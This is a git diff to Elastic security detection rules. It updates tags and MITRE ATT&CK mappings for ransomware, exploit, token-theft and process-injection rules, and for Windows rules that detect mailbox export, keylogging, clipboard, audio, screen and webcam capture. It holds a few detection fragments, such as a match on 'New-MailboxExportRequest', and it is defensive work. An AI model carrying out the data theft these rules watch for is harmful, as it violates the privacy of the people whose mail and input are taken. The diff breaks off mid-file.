b/rules/promotions/endgame_ransomware_prevented.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" maturity = "production" promotion = true -updated_date = "2025/03/21" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -26,7 +26,7 @@ setup = """## Setup For information on troubleshooting the maximum alerts warning please refer to this [guide](https://www.elastic.co/guide/en/security/current/alerts-ui-monitor.html#troubleshoot-max-alerts). """ severity = "high" -tags = ["Data Source: Elastic Endgame", "Resources: Investigation Guide"] +tags = ["Tactic: Impact", "Data Source: Elastic Endgame", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -69,3 +69,15 @@ Elastic Endgame is a security solution designed to prevent ransomware by monitor - Notify the IT security team and relevant stakeholders about the incident for awareness and further investigation into potential vulnerabilities exploited. - Document the incident details, including the response actions taken, to improve future incident response strategies and facilitate any necessary reporting or compliance requirements.""" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1486" +name = "Data Encrypted for Impact" +reference = "https://attack.mitre.org/techniques/T1486/" + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" diff --git a/rules/promotions/execution_endgame_exploit_detected.toml b/rules/promotions/execution_endgame_exploit_detected.toml index c74ed775d20..377f3d62796 100644 --- a/rules/promotions/execution_endgame_exploit_detected.toml +++ b/rules/promotions/execution_endgame_exploit_detected.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" maturity = "production" promotion = true -updated_date = "2025/03/21" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -26,13 +26,7 @@ setup = """## Setup For information on troubleshooting the maximum alerts warning please refer to this [guide](https://www.elastic.co/guide/en/security/current/alerts-ui-monitor.html#troubleshoot-max-alerts). """ severity = "high" -tags = [ - "Data Source: Elastic Endgame", - "Use Case: Threat Detection", - "Tactic: Execution", - "Tactic: Privilege Escalation", - "Resources: Investigation Guide", -] +tags = ["Tactic: Execution", "Data Source: Elastic Endgame", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -78,20 +72,12 @@ Elastic Endgame is a security solution that monitors and detects exploit attempt [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1203" +name = "Exploitation for Client Execution" +reference = "https://attack.mitre.org/techniques/T1203/" + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1068" -name = "Exploitation for Privilege Escalation" -reference = "https://attack.mitre.org/techniques/T1068/" - - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/promotions/execution_endgame_exploit_prevented.toml b/rules/promotions/execution_endgame_exploit_prevented.toml index 9882090ac4d..6e9ceb442ad 100644 --- a/rules/promotions/execution_endgame_exploit_prevented.toml +++ b/rules/promotions/execution_endgame_exploit_prevented.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" maturity = "production" promotion = true -updated_date = "2025/03/21" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -80,20 +80,25 @@ Elastic Endgame is a security solution designed to prevent exploits by monitorin [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1203" +name = "Exploitation for Client Execution" +reference = "https://attack.mitre.org/techniques/T1203/" + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1068" name = "Exploitation for Privilege Escalation" reference = "https://attack.mitre.org/techniques/T1068/" - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/promotions/privilege_escalation_endgame_cred_manipulation_detected.toml b/rules/promotions/privilege_escalation_endgame_cred_manipulation_detected.toml index c828eafd159..d25aef0cd49 100644 --- a/rules/promotions/privilege_escalation_endgame_cred_manipulation_detected.toml +++ b/rules/promotions/privilege_escalation_endgame_cred_manipulation_detected.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" maturity = "production" promotion = true -updated_date = "2025/03/21" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -26,7 +26,7 @@ setup = """## Setup For information on troubleshooting the maximum alerts warning please refer to this [guide](https://www.elastic.co/guide/en/security/current/alerts-ui-monitor.html#troubleshoot-max-alerts). """ severity = "high" -tags = ["Data Source: Elastic Endgame", "Use Case: Threat Detection", "Tactic: Privilege Escalation", "Resources: Investigation Guide"] +tags = ["Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -72,14 +72,26 @@ Elastic Endgame is a security solution that monitors and detects suspicious acti [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1134" name = "Access Token Manipulation" reference = "https://attack.mitre.org/techniques/T1134/" +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1134" +name = "Access Token Manipulation" +reference = "https://attack.mitre.org/techniques/T1134/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/promotions/privilege_escalation_endgame_cred_manipulation_prevented.toml b/rules/promotions/privilege_escalation_endgame_cred_manipulation_prevented.toml index 654389a20dd..ee8309c7d75 100644 --- a/rules/promotions/privilege_escalation_endgame_cred_manipulation_prevented.toml +++ b/rules/promotions/privilege_escalation_endgame_cred_manipulation_prevented.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" maturity = "production" promotion = true -updated_date = "2025/03/21" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -26,7 +26,7 @@ setup = """## Setup For information on troubleshooting the maximum alerts warning please refer to this [guide](https://www.elastic.co/guide/en/security/current/alerts-ui-monitor.html#troubleshoot-max-alerts). """ severity = "medium" -tags = ["Data Source: Elastic Endgame", "Use Case: Threat Detection", "Tactic: Privilege Escalation", "Resources: Investigation Guide"] +tags = ["Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -72,14 +72,26 @@ Elastic Endgame is a security solution that prevents unauthorized credential man [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1134" name = "Access Token Manipulation" reference = "https://attack.mitre.org/techniques/T1134/" +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1134" +name = "Access Token Manipulation" +reference = "https://attack.mitre.org/techniques/T1134/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/promotions/privilege_escalation_endgame_permission_theft_detected.toml b/rules/promotions/privilege_escalation_endgame_permission_theft_detected.toml index da56645fb6b..cd8997f1f08 100644 --- a/rules/promotions/privilege_escalation_endgame_permission_theft_detected.toml +++ b/rules/promotions/privilege_escalation_endgame_permission_theft_detected.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" maturity = "production" promotion = true -updated_date = "2025/03/21" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -26,7 +26,7 @@ setup = """## Setup For information on troubleshooting the maximum alerts warning please refer to this [guide](https://www.elastic.co/guide/en/security/current/alerts-ui-monitor.html#troubleshoot-max-alerts). """ severity = "high" -tags = ["Data Source: Elastic Endgame", "Use Case: Threat Detection", "Tactic: Privilege Escalation", "Resources: Investigation Guide"] +tags = ["Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -72,14 +72,36 @@ Elastic Endgame is a security solution that monitors and detects unauthorized ac [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1134" name = "Access Token Manipulation" reference = "https://attack.mitre.org/techniques/T1134/" +[[rule.threat.technique.subtechnique]] +id = "T1134.001" +name = "Token Impersonation/Theft" +reference = "https://attack.mitre.org/techniques/T1134/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1134" +name = "Access Token Manipulation" +reference = "https://attack.mitre.org/techniques/T1134/" + +[[rule.threat.technique.subtechnique]] +id = "T1134.001" +name = "Token Impersonation/Theft" +reference = "https://attack.mitre.org/techniques/T1134/001/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/promotions/privilege_escalation_endgame_permission_theft_prevented.toml b/rules/promotions/privilege_escalation_endgame_permission_theft_prevented.toml index 9b43b081eca..70363bba749 100644 --- a/rules/promotions/privilege_escalation_endgame_permission_theft_prevented.toml +++ b/rules/promotions/privilege_escalation_endgame_permission_theft_prevented.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" maturity = "production" promotion = true -updated_date = "2025/03/21" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -26,7 +26,7 @@ setup = """## Setup For information on troubleshooting the maximum alerts warning please refer to this [guide](https://www.elastic.co/guide/en/security/current/alerts-ui-monitor.html#troubleshoot-max-alerts). """ severity = "medium" -tags = ["Data Source: Elastic Endgame", "Use Case: Threat Detection", "Tactic: Privilege Escalation", "Resources: Investigation Guide"] +tags = ["Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -72,14 +72,36 @@ Elastic Endgame is a security solution that prevents unauthorized access by moni [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1134" name = "Access Token Manipulation" reference = "https://attack.mitre.org/techniques/T1134/" +[[rule.threat.technique.subtechnique]] +id = "T1134.001" +name = "Token Impersonation/Theft" +reference = "https://attack.mitre.org/techniques/T1134/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1134" +name = "Access Token Manipulation" +reference = "https://attack.mitre.org/techniques/T1134/" + +[[rule.threat.technique.subtechnique]] +id = "T1134.001" +name = "Token Impersonation/Theft" +reference = "https://attack.mitre.org/techniques/T1134/001/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/promotions/privilege_escalation_endgame_process_injection_detected.toml b/rules/promotions/privilege_escalation_endgame_process_injection_detected.toml index 38a36feec06..7de13ee97f7 100644 --- a/rules/promotions/privilege_escalation_endgame_process_injection_detected.toml +++ b/rules/promotions/privilege_escalation_endgame_process_injection_detected.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" maturity = "production" promotion = true -updated_date = "2025/03/21" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -26,7 +26,7 @@ setup = """## Setup For information on troubleshooting the maximum alerts warning please refer to this [guide](https://www.elastic.co/guide/en/security/current/alerts-ui-monitor.html#troubleshoot-max-alerts). """ severity = "high" -tags = ["Data Source: Elastic Endgame", "Use Case: Threat Detection", "Tactic: Privilege Escalation", "Resources: Investigation Guide"] +tags = ["Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -73,14 +73,26 @@ Elastic Endgame is a security solution that monitors and detects suspicious acti [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1055" name = "Process Injection" reference = "https://attack.mitre.org/techniques/T1055/" +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1055" +name = "Process Injection" +reference = "https://attack.mitre.org/techniques/T1055/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/promotions/privilege_escalation_endgame_process_injection_prevented.toml b/rules/promotions/privilege_escalation_endgame_process_injection_prevented.toml index 5a5e8b7765d..9c49b986608 100644 --- a/rules/promotions/privilege_escalation_endgame_process_injection_prevented.toml +++ b/rules/promotions/privilege_escalation_endgame_process_injection_prevented.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" maturity = "production" promotion = true -updated_date = "2025/03/21" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -26,7 +26,7 @@ setup = """## Setup For information on troubleshooting the maximum alerts warning please refer to this [guide](https://www.elastic.co/guide/en/security/current/alerts-ui-monitor.html#troubleshoot-max-alerts). """ severity = "medium" -tags = ["Data Source: Elastic Endgame", "Use Case: Threat Detection", "Tactic: Privilege Escalation", "Resources: Investigation Guide"] +tags = ["Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -72,14 +72,26 @@ Elastic Endgame is a security solution that prevents malicious activities like p [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1055" name = "Process Injection" reference = "https://attack.mitre.org/techniques/T1055/" +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1055" +name = "Process Injection" +reference = "https://attack.mitre.org/techniques/T1055/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/threat_intel/threat_intel_indicator_match_email.toml b/rules/threat_intel/threat_intel_indicator_match_email.toml index e4fa4bfc04d..f17ba379307 100644 --- a/rules/threat_intel/threat_intel_indicator_match_email.toml +++ b/rules/threat_intel/threat_intel_indicator_match_email.toml @@ -1,7 +1,7 @@ [metadata] creation_date = "2025/04/11" maturity = "production" -updated_date = "2025/04/22" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -80,7 +80,7 @@ or a [custom integration](https://www.elastic.co/guide/en/security/current/es-th More information can be found [here](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html). """ severity = "high" -tags = ["Rule Type: Threat Match", "Resources: Investigation Guide"] +tags = ["Rule Type: Threat Match", "Tactic: Initial Access", "Resources: Investigation Guide"] threat_index = ["filebeat-*", "logs-ti_*"] threat_indicator_path = "threat.indicator" threat_language = "kuery" @@ -165,3 +165,16 @@ value = "threat.indicator.email.address" type = "mapping" field = "email.reply_to.address" value = "threat.indicator.email.address" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1566" +name = "Phishing" +reference = "https://attack.mitre.org/techniques/T1566/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/windows/collection_email_outlook_mailbox_via_com.toml b/rules/windows/collection_email_outlook_mailbox_via_com.toml index bdff598faa5..7f7f82b9bac 100644 --- a/rules/windows/collection_email_outlook_mailbox_via_com.toml +++ b/rules/windows/collection_email_outlook_mailbox_via_com.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/11" integration = ["endpoint"] maturity = "production" -updated_date = "2025/02/14" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -21,14 +21,7 @@ references = [ risk_score = 47 rule_id = "1dee0500-4aeb-44ca-b24b-4a285d7b6ba1" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Collection", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Collection", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide"] type = "eql" query = ''' @@ -87,36 +80,36 @@ Outlook's integration with the Component Object Model (COM) allows processes to [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1114" name = "Email Collection" reference = "https://attack.mitre.org/techniques/T1114/" + [[rule.threat.technique.subtechnique]] id = "T1114.001" name = "Local Email Collection" reference = "https://attack.mitre.org/techniques/T1114/001/" - - [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1559" name = "Inter-Process Communication" reference = "https://attack.mitre.org/techniques/T1559/" + [[rule.threat.technique.subtechnique]] id = "T1559.001" name = "Component Object Model" reference = "https://attack.mitre.org/techniques/T1559/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/collection_email_powershell_exchange_mailbox.toml b/rules/windows/collection_email_powershell_exchange_mailbox.toml index 97ba3fb44a3..fee81690d6d 100644 --- a/rules/windows/collection_email_powershell_exchange_mailbox.toml +++ b/rules/windows/collection_email_powershell_exchange_mailbox.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/15" integration = ["endpoint", "windows", "system", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -75,21 +75,7 @@ references = [ risk_score = 47 rule_id = "6aace640-e631-4870-ba8e-5fdda09325db" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Collection", - "Tactic: Execution", - "Resources: Investigation Guide", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: SentinelOne", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Windows Security Event Logs", - "Data Source: Crowdstrike", - "Data Source: Sysmon", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Collection", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Data Source: Microsoft Defender for Endpoint", "Data Source: Windows Security Event Logs", "Data Source: Crowdstrike", "Data Source: Sysmon"] timestamp_override = "event.ingested" type = "eql" @@ -102,41 +88,18 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1005" -name = "Data from Local System" -reference = "https://attack.mitre.org/techniques/T1005/" [[rule.threat.technique]] id = "T1114" name = "Email Collection" reference = "https://attack.mitre.org/techniques/T1114/" + [[rule.threat.technique.subtechnique]] id = "T1114.002" name = "Remote Email Collection" reference = "https://attack.mitre.org/techniques/T1114/002/" - - [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.001" -name = "PowerShell" -reference = "https://attack.mitre.org/techniques/T1059/001/" - - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/collection_mailbox_export_winlog.toml b/rules/windows/collection_mailbox_export_winlog.toml index 90ae0bf3cf8..693f71e02fc 100644 --- a/rules/windows/collection_mailbox_export_winlog.toml +++ b/rules/windows/collection_mailbox_export_winlog.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/11" integration = ["windows"] maturity = "production" -updated_date = "2026/01/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -120,32 +120,21 @@ powershell.file.script_block_text : "New-MailboxExportRequest" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1005" -name = "Data from Local System" -reference = "https://attack.mitre.org/techniques/T1005/" [[rule.threat.technique]] id = "T1114" name = "Email Collection" reference = "https://attack.mitre.org/techniques/T1114/" -[[rule.threat.technique.subtechnique]] -id = "T1114.001" -name = "Local Email Collection" -reference = "https://attack.mitre.org/techniques/T1114/001/" [[rule.threat.technique.subtechnique]] id = "T1114.002" name = "Remote Email Collection" reference = "https://attack.mitre.org/techniques/T1114/002/" - - [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/collection_posh_audio_capture.toml b/rules/windows/collection_posh_audio_capture.toml index 3f922888c59..e40e8488f51 100644 --- a/rules/windows/collection_posh_audio_capture.toml +++ b/rules/windows/collection_posh_audio_capture.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/19" integration = ["windows"] maturity = "production" -updated_date = "2026/01/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -96,14 +96,7 @@ PowerShell Script Block Logging must be enabled to generate the events used by t Setup instructions: https://ela.st/powershell-logging-setup """ severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Collection", - "Resources: Investigation Guide", - "Data Source: PowerShell Logs", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Collection", "Tactic: Execution", "Resources: Investigation Guide", "Data Source: PowerShell Logs"] timestamp_override = "event.ingested" type = "query" @@ -129,39 +122,34 @@ event.category:process and host.os.type:windows and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1123" name = "Audio Capture" reference = "https://attack.mitre.org/techniques/T1123/" - [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - -[[rule.threat.technique]] -id = "T1106" -name = "Native API" -reference = "https://attack.mitre.org/techniques/T1106/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/collection_posh_clipboard_capture.toml b/rules/windows/collection_posh_clipboard_capture.toml index 149d213dfb5..f84dfe236b9 100644 --- a/rules/windows/collection_posh_clipboard_capture.toml +++ b/rules/windows/collection_posh_clipboard_capture.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/12" integration = ["windows"] maturity = "production" -updated_date = "2026/01/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -153,34 +153,16 @@ case_insensitive = true value = "?:\\\\Program?Files\\\\WindowsPowerShell\\\\Modules\\\\*.ps?1" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1115" name = "Clipboard Data" reference = "https://attack.mitre.org/techniques/T1115/" - [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.001" -name = "PowerShell" -reference = "https://attack.mitre.org/techniques/T1059/001/" - - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/collection_posh_keylogger.toml b/rules/windows/collection_posh_keylogger.toml index d99809a9e75..58297f5baa7 100644 --- a/rules/windows/collection_posh_keylogger.toml +++ b/rules/windows/collection_posh_keylogger.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/15" integration = ["windows"] maturity = "production" -updated_date = "2026/01/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -104,14 +104,7 @@ PowerShell Script Block Logging must be enabled to generate the events used by t Setup instructions: https://ela.st/powershell-logging-setup """ severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Collection", - "Resources: Investigation Guide", - "Data Source: PowerShell Logs", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Collection", "Tactic: Credential Access", "Tactic: Execution", "Resources: Investigation Guide", "Data Source: PowerShell Logs"] timestamp_override = "event.ingested" type = "query" @@ -135,44 +128,57 @@ event.category:process and host.os.type:windows and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1056" name = "Input Capture" reference = "https://attack.mitre.org/techniques/T1056/" + [[rule.threat.technique.subtechnique]] id = "T1056.001" name = "Keylogging" reference = "https://attack.mitre.org/techniques/T1056/001/" - - [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1056" +name = "Input Capture" +reference = "https://attack.mitre.org/techniques/T1056/" + +[[rule.threat.technique.subtechnique]] +id = "T1056.001" +name = "Keylogging" +reference = "https://attack.mitre.org/techniques/T1056/001/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - -[[rule.threat.technique]] -id = "T1106" -name = "Native API" -reference = "https://attack.mitre.org/techniques/T1106/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/collection_posh_mailbox.toml b/rules/windows/collection_posh_mailbox.toml index a13e4dc57b8..936b683766c 100644 --- a/rules/windows/collection_posh_mailbox.toml +++ b/rules/windows/collection_posh_mailbox.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/11" integration = ["windows"] maturity = "production" -updated_date = "2026/01/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -135,10 +135,12 @@ event.category:process and host.os.type:windows and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1114" name = "Email Collection" reference = "https://attack.mitre.org/techniques/T1114/" + [[rule.threat.technique.subtechnique]] id = "T1114.001" name = "Local Email Collection" @@ -149,30 +151,10 @@ id = "T1114.002" name = "Remote Email Collection" reference = "https://attack.mitre.org/techniques/T1114/002/" - - [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.001" -name = "PowerShell" -reference = "https://attack.mitre.org/techniques/T1059/001/" - - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/collection_posh_screen_grabber.toml b/rules/windows/collection_posh_screen_grabber.toml index f97f5db210d..8c0cdb1752a 100644 --- a/rules/windows/collection_posh_screen_grabber.toml +++ b/rules/windows/collection_posh_screen_grabber.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/19" integration = ["windows"] maturity = "production" -updated_date = "2026/01/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -136,34 +136,16 @@ event.category:process and host.os.type:windows and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1113" name = "Screen Capture" reference = "https://attack.mitre.org/techniques/T1113/" - [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.001" -name = "PowerShell" -reference = "https://attack.mitre.org/techniques/T1059/001/" - - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/collection_posh_webcam_video_capture.toml b/rules/windows/collection_posh_webcam_video_capture.toml index f50dd0f2e8e..02a9ad1f14e 100644 --- a/rules/windows/collection_posh_webcam_video_capture.toml +++ b/rules/windows/collection_posh_webcam_video_capture.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/18" integration = ["windows"] maturity = "production" -updated_date = "2026/01/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -93,14 +93,7 @@ PowerShell Script Block Logging must be enabled to generate the events used by t Setup instructions: https://ela.st/powershell-logging-setup """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Collection", - "Data 